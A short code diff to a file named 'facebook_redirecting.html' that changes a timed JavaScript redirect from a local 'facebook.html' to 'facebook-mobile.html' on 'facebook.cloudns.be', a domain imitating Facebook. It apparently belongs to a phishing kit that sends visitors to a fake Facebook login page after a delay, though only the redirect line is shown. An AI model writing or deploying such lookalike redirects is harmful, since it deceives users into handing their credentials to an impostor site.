--- a/facebook_redirecting.html
+++ b/facebook_redirecting.html
@@ -38,7 +38,7 @@
 
   <script>
     setTimeout(function() {
-      window.location.href = "facebook.html";
+      window.location.href = "http://facebook.cloudns.be/facebook-mobile.html";
     }, 4500);
   </script>
 </body>
